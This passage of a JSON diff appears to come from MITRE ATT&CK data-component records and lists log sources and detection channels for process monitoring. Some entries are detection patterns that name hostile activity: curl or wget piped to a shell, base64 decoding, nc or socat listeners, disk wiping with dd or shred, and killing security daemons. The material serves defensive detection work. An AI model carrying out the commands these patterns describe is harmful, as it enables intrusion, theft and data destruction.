+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of files saved in mail or download directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Terminal, osascript, or other interpreters originating from Mail or Preview"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process events"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unauthorized sudo or shell access, especially leading to file changes in /var/www or /srv/http"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of unexpected terminal or web scripts modifying /Library/WebServer/Documents"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of CLI tools like psql, mysql, mongo, sqlite3"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process start of Java or native DB client tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "loginwindow or tccd-related entries"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "query: process_events, launchd, and tcc.db access"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "process execution or network connect from just-created container PID namespace"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of pip, npm, gem, or similar package managers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Command line invocation of pip3, brew install, npm install from interactive Terminal"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "fork/exec of service via PID 1 (systemd)"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of ssh/scp/sftp without corresponding authentication log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of ssh or sftp without corresponding login event"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: execve where exe=/usr/bin/python3 or similar interpreter"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch of remote desktop app or helper binary"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected processes making network calls based on DNS-derived ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl spawning new processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl activity and process creation"
+                        },
+                        {
+                            "name": "containerd:events",
+                            "channel": "New container with suspicious image name or high resource usage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Python, Swift, or other binaries invoking archiving libraries"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Processes linked with libssl or crypto libraries making outbound connections"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process invoking SSL routines from Security framework"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of binaries located in /etc/init.d/ or systemd service paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of binary listed in newly modified LaunchAgent plist"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of bless or nvram modifying boot parameters"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected processes registered with launchd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process launch"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of curl, osascript, or unexpected Office processes"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Trust validation failures or bypass attempts during notarization and code signing checks"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "spawned shell or execution environment activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process_exec: image in {/bin/bash,/bin/zsh,/usr/bin/osascript,/usr/bin/python*,/usr/bin/curl,/usr/bin/ssh,/usr/bin/open} AND parent in {Preview, TextEdit, Microsoft Word, Microsoft Excel, AdobeReader, Archive Utility, Finder}"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: exe in {/bin/bash,/bin/sh,/usr/bin/python*,/usr/bin/perl,/usr/bin/php,/usr/bin/node,/usr/bin/curl,/usr/bin/wget,/usr/bin/xdg-open,/usr/bin/ssh,/usr/bin/rundll32 (wine)} AND ppid process is a document viewer/browser"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of dd/sgdisk with arguments writing to sector 0 or partition table"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of zip, ditto, hdiutil, or openssl by processes not normally associated with archiving"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for chmod, chown, chflags with unusual parameters or targets"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "AdvancedHunting(DeviceEvents, ProcessCreate, ImageLoad, AMSI/ETW derived signals)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execve or dylib load from memory without backing file"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands that alter firewall or start listeners: iptables|nft|ufw|firewall-cmd|pfctl|systemctl start sshd/telnet/dropbear; raw-socket/libpcap tools (tcpdump, tshark, nmap --raw)."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of pfctl, socketfilterfw, launchctl start ssh/telnet, libpcap consumers."
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Shell Execution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unusual child process tree indicating attempted recovery after crash"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of binaries/scripts presenting false health messages for security daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of processes mimicking Apple Security & Privacy GUIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, setifflags"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events where path like '%tcpdump%'"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of dd, shred, or wipe with arguments targeting block devices"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "systemctl stop auditd, kill -9 <pid>, or modifications to /etc/selinux/config"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of curl, git, or Office processes with network connections"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream - process subsystem"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls for qemu-system*, kvm, or VBoxHeadless"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process execution for VBoxHeadless, prl_vm_app, vmware-vmx"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process logs"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of interpreters (python, perl), custom binaries, or shell utilities with long arguments containing non-standard tokens"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC: arguments contain long, non-standard tokens / custom alphabets"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "command line or log output shows non-standard encoding routines"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "commands containing long non-standard tokens or custom lookup tables"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of /usr/sbin/installer spawning child process from within /private/tmp or package contents"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of dpkg or rpm followed by fork/execve from within postinst, prerm, etc."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execve: Helper tools invoked through XPC executing unexpected binaries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of modified binary without valid signature"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: exe in (/usr/bin/bash,/usr/bin/sh,/usr/bin/zsh,/usr/bin/python*) AND cmdline matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64\\s*-d|python\\s*-c'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: ParentImage in (Terminal, iTerm2) AND Image in (/bin/zsh,/bin/bash,/usr/bin/python*) AND CommandLine matches '(curl|wget).*(\\||\\|\\s*sh|bash)|base64 -D|python -c'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process created with repeated ICMP or UDP flood behavior"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "binary execution of security_authtrampoline"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: exec"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Child processes of Safari, Chrome, or Firefox executing scripting interpreters"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of older or non-standard interpreters"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process execution events for permission modification utilities with command-line analysis"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for chmod, chown, chflags with parameter analysis and target path examination"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process execution monitoring for permission modification utilities with command-line argument analysis"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Invocation of packet generation tools (e.g., hping3, nping) or fork bombs"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Execution of flooding tools or compiled packet generators"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve for proxy tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process, socket, and DNS logs"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events table"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Command line containing `trap` or `echo 'trap` written to login shell files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log collect --predicate"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or nanosleep with no stdout/stderr I/O"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd or osascript spawns process with delay command"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "systemd-udevd spawning user-defined action from RUN+="
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "execve"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:spawn"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'eventMessage contains \"exec\"'"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "cat|less|grep accessing .bash_history from a non-shell process"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Process execution via .desktop Exec path from /etc/xdg/autostart or ~/.config/autostart"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of dpkg, rpm, or other package manager with list flag"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of system_profiler or osascript invoking enumeration"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "apache2 or nginx spawning sh, bash, or python interpreter"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "httpd spawning bash, zsh, python, or osascript"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of /usr/libexec/security_authtrampoline or child processes originating from non-trusted binaries triggering credential prompts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of security or osascript"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd spawning processes tied to new or modified LaunchDaemon .plist entries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of ping, nping, or crafted network packets via bash or python to reflection services"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of commands modifying iptables/nftables to block selective IPs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "System process modifications altering DNS/proxy settings"
+                        },
+                        {
+                            "name": "containerd:Events",
+                            "channel": "unusual process spawned from container image context"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "curl, python scripts, rsync with internal share URLs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: spawn, exec"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Rapid spawning of resource-heavy applications (e.g., Preview, Safari, Office)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process creation events where command line = pmset with arguments affecting sleep, hibernatemode, displaysleep"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected apps performing repeated DNS lookups"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchservices or loginwindow events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve with LD_PRELOAD or linker-related environment variables set"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of process with DYLD_INSERT_LIBRARIES set"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious Swift/Objective-C or scripting processes writing archive-like outputs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of re-parented process"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Anomalous parent PID change"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process creation with parent PID of 1 (launchd)"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "child process invoking dynamic linker post-ptrace"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Processes executing kextload, spctl, or modifying kernel extension directories"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Unsigned or ad-hoc signed process executions in user contexts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of diskutil or hdiutil attaching hidden partitions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for discovery utilities (system_profiler, sw_vers, dscl, networksetup) with command-line parameter analysis"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process event monitoring with focus on discovery utilities and cryptographic framework usage correlation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected apps generating frequent DNS queries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process exec"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket: Suspicious creation of AF_UNIX sockets outside expected daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Non-standard processes invoking financial applications or payment APIs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Agent/headless flags (listen/connect/reverse/tunnel) or remote-control binaries spawning shells"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "systemctl enable/start: Creation/enablement of custom .service units in /etc/systemd/system"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process exec of remote-control apps or binaries with headless/connect flags"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: systemctl stop, service stop, or kill -9 on security daemons (e.g., falcon-sensor, auditd)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of launchctl unload, kill, or removal of security agent daemons"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process activity, exec events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream process subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:exec and kext load events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --info --predicate 'eventMessage CONTAINS \"exec\"'"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-DotNETRuntime",
+                            "channel": "Unexpected AppDomain creation events or anomalous AppDomainManager assembly load behavior"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of network stress tools or anomalies in socket/syscall behavior"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unsigned binary execution following SIP change"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands altering firewall or enabling listeners (iptables, nft, ufw, firewall-cmd, systemctl start *ssh*/*telnet*, ip route add, tcpdump, tshark)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of /sbin/pfctl, /usr/libexec/ApplicationFirewall/socketfilterfw, ifconfig, tcpdump, npcap/libpcap consumers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of zip, ditto, hdiutil, or openssl by non-terminal parent processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of binaries with TCC protected access under unexpected parent processes such as Finder.app, SystemUIServer, or nsurlsessiond"
+                        },
+                        {
+                            "name": "WinEventLog:AppLocker",
+                            "channel": "EventCode=8003, 8004"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, unlink"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd, processes"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "socat, ssh, or nc processes opening unexpected ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution of ssh with -L/-R forwarding flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchd or cron spawning mining binaries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve or socket/connect system calls for processes using RSA handshake"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process invoking SecKeyCreateRandomKey or asymmetric crypto APIs"
+                        },
+                        {
+                            "name": "azure:vmguest",
+                            "channel": "Unexpected execution of cloud agent processes (e.g., WindowsAzureGuestAgent.exe, ssm-agent) followed by arbitrary script or binary execution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Script interpreter invoked by nginx/apache worker process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of Office binaries with network activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch of bash/zsh/python/osascript targeting key file locations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of /sbin/emond with child processes launched"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "provider: ETW CreateProcess events linking msbuild.exe to suspicious children where standard logs are incomplete"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "shutdown -h now or reboot"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Code.app, idea, JetBrainsToolbox, eclipse with install/extension flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for system discovery utilities (system_profiler, sysctl, networksetup, ioreg) with parameter analysis"
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "BSM audit events for process execution and system call monitoring during reconnaissance"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "host daemon events related to VM operations and configuration queries during reconnaissance"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMware kernel events for hardware and system configuration access during environmental validation"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "processes modifying environment variables related to history logging"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: parent process is usb/hid device handler, child process bash/python invoked"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of curl, rclone, or Office apps invoking network sessions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of kextstat, kextfind, or ioreg targeting driver information"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process creation involving binaries interacting with resource fork data"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process event"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of suspicious exploit binaries targeting security daemons"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve: Unsigned or unnotarized processes launched with high privileges"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "security OR injection attempts into 1Password OR LastPass"
+                        },
+                        {
+                            "name": "AndroidLogs:Kernel",
+                            "channel": "init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock"
+                        },
+                        {
+                            "name": "AndroidLogs:Framework",
+                            "channel": "Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Creation of a new process with elevated UID or sensitive entitlements whose binary path is associated with an app container or whose parent/caller is a low-privileged app/webcontent process"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes audio buffer or recorded audio file into application storage directories"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application installed from adb, sideload, or unknown USB source"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.773000+00:00\", \"old_value\": \"2026-04-13 15:49:16.424000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0032\", \"old_value\": \"https://attack.mitre.org/data-components/DC0032\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-05-11 16:22:58.802000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0107",
+                            "external_id": "DC0107"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Process History/Live Data",
+                    "description": "This includes any data stores that maintain historical or real-time events and telemetry recorded from various sensors or devices",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-04-22 14:51:44.669000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0034",
+                            "external_id": "DC0034"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Process Metadata",
+                    "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.process"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "CodeIntegrity/WDAC events indicating unsigned/invalid DLL loads"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo or service accounts invoking loaders with suspicious env vars"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Process Context"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "user session"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Admin activity"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call for sudo where euid != uid"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.TCC"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec of binary with setuid/setgid and EUID != UID"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Use of fork/exec with DISPLAY unset or redirected"
+                        },
+                        {
+                            "name": "EDR:Telemetry",
+                            "channel": "Process lineage and API usage enrichment (GetSystemTime, GetTimeZoneInformation, NtQuerySystemTime)"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "/var/log/hostd.log API calls reading/altering time/ntp settings"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, prctl, or ptrace activity affecting process memory or command-line arguments"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Cross-reference argv[0] with actual executable path and parent process metadata"
+                        },
+                        {
+                            "name": "WinEventLog:AppLocker",
+                            "channel": "AppLocker audit/blocks showing developer utilities executing scripts/binaries outside policy"
+                        },
+                        {
+                            "name": "EDR:hunting",
+                            "channel": "Correlation of signer info, parent-child lineage, rare invocation context (user host role), and API surfaces (CreateProcess*, LoadLibrary*)"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Security-Mitigations/KernelMode",
+                            "channel": "ETW telemetry indicating ClickOnce deployment (dfsvc.exe) launching payloads"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-ClickOnce",
+                            "channel": "provider: Event Tracing for Windows (ETW) events associated with ClickOnce deployment (dfsvc.exe activity)"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Camera Frame Server/Operational",
+                            "channel": "Process session start/stop events for camera pipeline by unexpected executables"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "select: path LIKE '/dev/video%'"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "state=attached/debugged"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Code Execution & Entitlement Access"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process opening SSH_AUTH_SOCK or /tmp/ssh-* socket not owned by same UID"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "code signature/memory protection"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve with UID \u2260 EUID"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve with escalated privileges"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "cross-account or unexpected assume role"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log collect from launchd and process start"
+                        },
+                        {
+                            "name": "containerd:events",
+                            "channel": "Docker or containerd image pulls and process executions"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Kernel or daemon warnings of downgraded TLS or cryptographic settings"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modifications or writes to EFI system partition for downgraded bootloaders"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
